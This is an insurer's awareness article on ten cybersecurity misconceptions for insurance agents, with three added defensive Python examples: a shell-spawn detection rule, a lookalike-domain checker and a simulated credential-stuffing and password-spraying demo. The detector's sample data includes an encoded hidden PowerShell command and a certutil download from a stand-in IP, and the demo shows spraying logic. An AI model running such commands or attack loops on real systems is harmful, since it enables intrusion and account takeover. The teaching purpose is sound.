Utica First Insurance Company
Over the last five to seven years, cybersecurity has been one of the hottest and most polarizing topics in business. Almost every day you can read about the latest data breach at some company, and along with that news come salespeople proclaiming that their product would have prevented it. You've probably heard this tune before. With all the drama and coverage around these breaches, a lot of misinformation and confusion is inevitable, even on what should be very simple topics.
In this article I walk through 10 common misconceptions insurance agents have about cybersecurity and explain what is important to know about each. Each one is a lesson in both what not to do (or think) and what to do instead. Use them as talking points with your staff and help them understand these topics too. We are only as strong as our weakest link.
1. We can be 100% secure
Believe it or not, some people subscribe to the theory that you can be 100% secure. The truth is, you cannot. Even if, in a perfect world, you could lock everything down and be completely certain you were 100% secure, what would that mean for your business? Could you still get work done easily and efficiently? No. Risk management is at the heart of cybersecurity: just as you cannot prevent every loss from ordinary business risk, you cannot prevent every loss from cybersecurity risk.
If there is only one universal truth in cybersecurity, it's that 100% security is a myth, and those who try to attain it either fail or go crazy trying. Don't try to be 100% secure; focus on mitigation and resilience instead.
2. Only big companies get hacked
The 2019 Verizon Data Breach Investigations Report (DBIR) found that 43% of the breaches Verizon investigated or had data on involved small businesses. Now, you might be saying, "Hmm, that's lower than I thought." Stop and think for a minute about all the small businesses that never report an incident, or whose incident never makes the mainstream news. There are far more data breaches than the news can possibly cover.
The hard truth is that hackers are champing at the bit for weak targets. Sometimes that means the Targets and Home Depots of the world, and sometimes it means Ian the insurance agent or Larry the lawyer.
3. Who would want to hack me or my agency? We don’t have anything valuable
In the same 2019 DBIR, Verizon found that financial gain was the motive behind 71% of breaches. Data is now more valuable than oil, especially data that can be bought and sold: it is used for identity theft, fraud, scams and more, and criminals go where the money is. As a financial services business, an insurance agency is full of data hackers want: email addresses, usernames, passwords, driver's license numbers, Social Security numbers, credit card numbers and much more. Even personal information that isn't private is valuable. Why do you think Amazon knows so much about you? That information is harvested and purchased from sources all over the internet.
4. Anti-virus is enough to keep us safe
I use anti-virus to catch the low-hanging fruit of malware. Most anti-virus products on the market will catch the random, spray-and-pray, commodity malware: code that doesn't change much, if at all, or has very identifiable patterns of activity. Against more sophisticated malware that uses evasion techniques (repacking, obfuscation, or abusing legitimate system tools that are already on the machine), your regular old anti-virus becomes much less effective, if it is effective at all.
Anti-virus is just one layer of what should be a multi-layered approach to cybersecurity. Maybe anti-virus doesn't spot the malicious attachment in your email, but because of the detection capabilities you have set up, you are alerted when strange processes begin to spawn on your computer (Word launching PowerShell, for example) and you can quarantine the machine before the malware spreads.
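To make the "strange processes begin to spawn" layer concrete, here is an added example (not code from the original article) of the kind of rule a detection tool runs over process-creation telemetry: a document viewer such as Word or Excel launching a command interpreter. The events are constructed to resemble the fields Windows process-creation logging provides (parent image, child image, command line); the paths, PIDs and command lines are invented for the demo.

```python
"""Flag document viewers that spawn command interpreters.

Added example, not code from the original article. The events below are
constructed to look like Windows process-creation telemetry (the fields
Sysmon Event ID 1 or Security event 4688 provide: parent image, child image,
command line); none of it is real data.
"""
import re

# Programs that open attachments; they have little legitimate reason to launch shells.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# Children that commonly appear as the first stage of macro or attachment malware.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line patterns that raise the severity when seen under a document app.
ENCODED_PS = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_HINT = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|urlcache|https?://", re.I)

def basename(path):
    """Last path component, lowercased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event):
    """Return (severity, reason) if the parent/child pair is suspicious, else None."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    if parent not in DOCUMENT_APPS or child not in SHELL_CHILDREN:
        return None
    severity = "medium"
    reasons = [f"{parent} spawned {child}"]
    cmd = event.get("command_line", "")
    if ENCODED_PS.search(cmd):
        severity = "high"
        reasons.append("encoded PowerShell command")
    if DOWNLOAD_HINT.search(cmd):
        severity = "high"
        reasons.append("download cradle")
    return severity, "; ".join(reasons)

def suspicious_spawns(events):
    """Run the rule over a batch; return [(pid, severity, reason), ...] in event order."""
    alerts = []
    for ev in events:
        hit = score_event(ev)
        if hit:
            alerts.append((ev["pid"], hit[0], hit[1]))
    return alerts

# Constructed sample telemetry: two malicious spawns, two benign ones.
SAMPLE_EVENTS = [
    {"pid": 4120,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 4133,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.dat %TEMP%\\a.dat"},
    {"pid": 4150,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe"},
    {"pid": 4161,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for pid, severity, reason in suspicious_spawns(SAMPLE_EVENTS):
        print(f"[{severity}] pid={pid}: {reason}")
```

The rule never looks at the file the user opened, which is why it still fires when anti-virus has no signature for the attachment: the malware has to do something after it runs, and a spreadsheet launching certutil to fetch a file from the internet is that something. The explorer.exe and print-spooler children are there to show that the rule stays quiet on ordinary activity.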
5. All email and attachments are safe to open, especially those from my contacts
One of the most common ways to get someone to open a malicious attachment is to make the email appear to come from someone they know, or someone they are currently in an email exchange with, either by spoofing the sender's address or by sending from a contact's compromised mailbox as a reply inside an existing thread. This works incredibly well for hackers. They rely on the trust you already have in that sender and hope it gets you to open the malicious Word document they sent.
I wouldn't go so far as to say that no email or attachment is safe, even from your contacts, but it's fairly close. It's better to be unsure and ask IT or Security for help than to be unsure and open it anyway because you don't want to wait, or because you don't think anyone would want to hack you.
6. All websites are completely safe, especially the ones with the little lock symbol
This is one of those topics where the risks are not obvious. More and more websites now use HTTPS, and the share that do has grown enormously. However, there is a common misconception that the 's' in HTTPS means safe. There is a big difference between secure and safe.
HTTPS means that the communication from point A to point B is secured: the information exchanged, for example between your bank's servers and your browser, is encrypted and protected from tampering in transit. Someone sitting on the network between you and the server cannot read it or silently alter it. That is all HTTPS promises. It says nothing about who is at point B beyond the fact that they control the domain name shown in the address bar.
One thing I will say, however, is that hackers know that we as humans look for that little lock symbol in our browsers; we have been trained to look for it. So hackers say, "OK, fine, I'll just send them a fake website and put that lock icon there." The lock icon means the website has a certificate, and all a certificate proves is that whoever runs the site controlled that domain name when it was issued. Certificates are free (Let's Encrypt issues them automatically), or you can host the site on a platform such as Microsoft Azure and use the certificate it provides.
Then all the hacker has to do is convince you to visit the fake site (perhaps made to look like your bank), and they can easily steal your password and anything else you type while you're there. Since the hacker controls the website and the certificate, the encryption protects your traffic from everyone except the person you're sending it to.
Just because the site says secure and uses HTTPS doesn't mean it's safe to use. Check that the domain in the address bar is the one you expect.
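The difference between "secure" and "safe" comes down to the hostname, so here is an added example (not code from the original article) of what checking it actually involves. The bank domain `examplebank.com` and every sample URL are hypothetical; each lookalike shown would be just as able to obtain a certificate and show the lock icon as the real site.

```python
"""Is this link really the site I expect?

Added example, not code from the original article. A lock icon only says
the connection is encrypted to whatever host is in the address bar; this
check asks whether that host is actually the expected domain. The bank
domain "examplebank.com" and all sample URLs are hypothetical.
"""
from urllib.parse import urlsplit

def host_of(url):
    """Lowercased hostname from a URL (userinfo and port stripped); None if absent."""
    if "://" not in url:
        url = "https://" + url  # bare hosts as pasted from chat or email
    return urlsplit(url).hostname

def is_expected_site(url, expected_domain):
    """True only if the host is expected_domain itself or a subdomain of it."""
    host = host_of(url)
    if host is None:
        return False
    return host == expected_domain or host.endswith("." + expected_domain)

def lookalike_hints(url, expected_domain):
    """For a non-matching host, list the tricks that make it resemble the expected site."""
    if is_expected_site(url, expected_domain):
        return []
    host = host_of(url) or ""
    brand = expected_domain.split(".")[0]
    hints = []
    # Cyrillic 'а' in place of Latin 'a', or punycode, still gets a valid certificate.
    if host.startswith("xn--") or ".xn--" in host or any(ord(c) > 127 for c in host):
        hints.append("non-ASCII or punycode host (possible homoglyph)")
    # examplebank.com.verify-account.net is a subdomain of verify-account.net.
    if expected_domain in host:
        hints.append("expected domain embedded as a subdomain of another domain")
    # examplebank-secure.com is a different registrable domain entirely.
    if brand in host and "-" in host:
        hints.append("brand name combined with hyphenated words")
    # examp1ebank.com: fold common digit-for-letter swaps before comparing.
    folded = host.translate(str.maketrans("01357", "olesz"))
    if brand in folded and brand not in host:
        hints.append("digit substituted for a letter in the brand name")
    # https://examplebank.com@evil.example/ : the part before @ is userinfo, not the host.
    authority = url.split("://", 1)[-1].split("/", 1)[0]
    if "@" in authority:
        hints.append("userinfo before @ hides the real host")
    return hints

if __name__ == "__main__":
    BANK = "examplebank.com"
    for link in ["https://online.examplebank.com/login",
                 "https://examplebank.com.verify-account.net/login",
                 "https://examp1ebank.com/",
                 "https://ex\u0430mplebank.com/",
                 "https://examplebank.com@evil.example/login"]:
        print(is_expected_site(link, BANK), link, lookalike_hints(link, BANK))
```

Notice that nothing in this check asks whether the connection uses HTTPS. The browser already guarantees that the traffic is encrypted to the host it shows; the only question a user can answer, and the only one the lock icon cannot, is whether that host is the right one.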
7. My IT department stops all the bad stuff
As good as we are as IT practitioners, and as much as we want to be heroes (and we sure do try), we cannot and will never stop everything. Where there is a will there is a way, and that saying holds for cybersecurity too. With enough time, money, resources and motive, attackers will find a way through your defenses. That's not doom and gloom; that's just reality.
IT and Security cannot block every bad email before it reaches your mailbox or prevent every bad site from being clicked in your browser. You have to take some responsibility and keep your situational awareness while you work, especially when you're in email and on the web.
Take care, slow down, pay attention to the warning signs or red flags and you will be better able to spot bad stuff when it comes your way.
8. I can't be easily tricked
While I admire the hubris, we are all human, and humans by nature are trusting; because of that trust we can be fooled, tricked and conned. I really think that if you believe you can't be tricked, you will often be one of the first to get tricked. The way it happens is that someone does enough research about you to learn that you're a season ticket holder for your local professional baseball team and a huge fan of the first baseman. That first baseman has a hobby selling hard-to-find Nike sneakers, so naturally you're into them too. Since you can find out almost anything about anyone online, that information can be used against you in a well-crafted phishing email announcing that an amazing deal on super-rare Nike sneakers has been found and you must act now to get them at 75% off.
When it comes to email, if it sounds too good to be true, it usually is.
9. Using the same password for every site is smart and saves time
Going back to the 2019 Verizon DBIR: Verizon found that 29% of all data breaches involved the use of stolen credentials, and a whopping 80% of hacking-related breaches involved weak or stolen credentials.
This is happening because breach after breach has exposed hundreds of millions of passwords. Attackers replay those leaked email-and-password pairs against other sites (credential stuffing), and they also take the top 100, 1,000 or 10,000 most common passwords from those dumps and try them against every account they can find (password spraying).
Based purely on the math, they are bound to succeed somewhere. One compromise can lead to ten more through password reuse alone.
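To show the math rather than assert it, here is an added example (not code from the original article) that runs both attacks against a small, constructed user base. The agency portal, its users, their passwords and the "leaked" dump from some other site are all invented for the demo; the portal stores salted PBKDF2 hashes, as a careful site would, which changes nothing about how well reuse works for the attacker. The `is_breached` check at the end is modelled on the range-query shape of the Pwned Passwords API (send a 5-character SHA-1 prefix, compare suffixes locally) but runs entirely offline against the constructed dump.

```python
"""Why password reuse turns one breach into many.

Added example, not code from the original article. Every account, password
and the "leaked" dump below is constructed for the demo; the portal is a
hypothetical agency login that stores salted PBKDF2-SHA256 hashes.
"""
import hashlib
import os
import secrets

ROUNDS = 10_000  # demo value; real deployments use a far higher work factor

def make_record(password, rounds=ROUNDS):
    """Store a password as (salt, rounds, PBKDF2-SHA256 digest)."""
    salt = os.urandom(16)
    return salt, rounds, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)

def verify(record, candidate):
    """Constant-time comparison of a login attempt against the stored record."""
    salt, rounds, digest = record
    guess = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, rounds)
    return secrets.compare_digest(digest, guess)

# Constructed portal user base (hypothetical agency portal, not real data).
PORTAL = {email: make_record(pw) for email, pw in [
    ("ian@agency.example",   "Baseball2019!"),     # reused from another site
    ("larry@agency.example", "summer2019"),        # reused from another site
    ("pat@agency.example",   "Tr0ub4dor&3-lime"),  # changed after the other site's breach
    ("sam@agency.example",   "vS7!kd-plover-92"),  # unique per site
    ("kim@agency.example",   "Password1"),         # weak, never leaked anywhere
    ("lee@agency.example",   "qwerty"),            # weak, never leaked anywhere
]}

# Constructed dump from some unrelated breached site.
LEAKED_DUMP = [
    ("ian@agency.example", "Baseball2019!"),
    ("larry@agency.example", "summer2019"),
    ("pat@agency.example", "hunter2"),
    ("nobody@elsewhere.example", "abc123"),
]

# A "top 10" list of the kind harvested from dumps like the one above.
TOP_PASSWORDS = ["123456", "password", "123456789", "qwerty", "12345678",
                 "111111", "welcome1", "Summer2019", "Password1", "letmein"]

def credential_stuffing(dump, portal):
    """Replay leaked email/password pairs as-is; only reuse makes this work."""
    return sorted(email for email, pw in dump if email in portal and verify(portal[email], pw))

def password_spraying(top_list, portal):
    """Try a short list of common passwords against every account, one guess per account per pass."""
    hits = {}
    for pw in top_list:                           # few passwords...
        for email, record in portal.items():      # ...across many accounts, so lockouts rarely trigger
            if email not in hits and verify(record, pw):
                hits[email] = pw
    return hits

def breached_suffixes(prefix, dump):
    """Range query: SHA-1 suffixes of every leaked password whose hash starts with prefix."""
    out = set()
    for _, pw in dump:
        h = hashlib.sha1(pw.encode()).hexdigest().upper()
        if h[:5] == prefix:
            out.add(h[5:])
    return out

def is_breached(password, dump):
    """Check a candidate password against the dump while only ever sharing its 5-char hash prefix."""
    h = hashlib.sha1(password.encode()).hexdigest().upper()
    return h[5:] in breached_suffixes(h[:5], dump)

if __name__ == "__main__":
    print("stuffing:", credential_stuffing(LEAKED_DUMP, PORTAL))
    print("spraying:", password_spraying(TOP_PASSWORDS, PORTAL))
    print("hunter2 breached?", is_breached("hunter2", LEAKED_DUMP))
```

Four of the six accounts fall, and the portal did nothing wrong: Ian and Larry are lost to stuffing because they reused passwords, Kim and Lee to spraying because theirs are on every top list. Pat, whose old password is in the dump, survives only because it was changed; Sam survives because the password is unique. A site that runs the `is_breached` check when a password is set blocks Kim's and Lee's choices before an attacker ever tries them.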
10. No one can guess my password
That's OK; they don't need to guess it. They will just ask you for it, in the form of a fake login page or a suspicious phone call from 'IT'. Or they will simply try one of the 500+ million leaked passwords now floating around online. Actually guessing passwords really only comes into play after someone has broken into your network and downloaded your entire user directory, at which point they can crack the password hashes offline at their leisure.
Making your passwords unique across all of your accounts and enabling multi-factor authentication are the best ways to combat this type of attack. A unique password limits one breach to one account, and multi-factor authentication means a stolen password alone is not enough to log in.
What You Know Someone Else May Not
What seems simple and obvious to you and me might not be so for others, including your agency owner, other agents in your office, or even customers. I encourage you to share what you know. Help others understand what using unique passwords for all their accounts means. If you can't help them yourself, help them find the answer, or at least point them in the right direction.
We're all in this together and the more we all know, the better.